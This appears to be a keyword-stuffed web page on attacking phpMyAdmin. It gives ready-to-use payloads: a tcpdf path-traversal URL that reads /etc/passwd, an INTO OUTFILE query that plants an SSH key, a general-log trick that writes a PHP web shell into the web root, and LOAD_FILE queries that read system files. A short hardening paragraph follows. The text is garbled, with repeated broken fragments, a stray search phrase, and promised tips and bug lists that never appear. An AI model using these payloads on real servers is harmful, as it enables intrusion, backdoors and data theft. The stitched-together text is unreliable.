Phpmyadmin Hacktricks <2024>

Example:

http://example.com/phpmyadmin/libraries/tcpdf/tcpdf.php?tcpdf_import=../../../../etc/passwd

If you can write to /root/.ssh/ or user's home:

SELECT "ssh-rsa AAAAB3..." INTO OUTFILE '/home/user/.ssh/authorized_keys'

If secure_file_priv is set (prevents INTO OUTFILE), use the general log method: phpmyadmin hacktricks

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

Once logged in, the real fun begins.

For blue teams / system administrators, HackTricks would conclude with these hardening tips: Example: http://example

If database contains file paths (e.g., user_uploads table), insert malicious files into those paths. Or use LOAD_FILE() to read local files:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/windows/win.ini');

phpMyAdmin is a powerful tool but can become an easy attack vector when exposed, misconfigured, or unpatched. Combining network restrictions, least-privilege database design, strong authentication, diligent patching, and continuous monitoring significantly reduces risk. Administrators should treat phpMyAdmin as a high-risk administration interface and apply defense-in-depth controls accordingly. If you can write to /root/

HackTricks reminds us that even without credentials, phpMyAdmin itself has had nasty RCE bugs:

These show that a fully patched phpMyAdmin is important, but an exposed, unpatched instance is a disaster waiting to happen.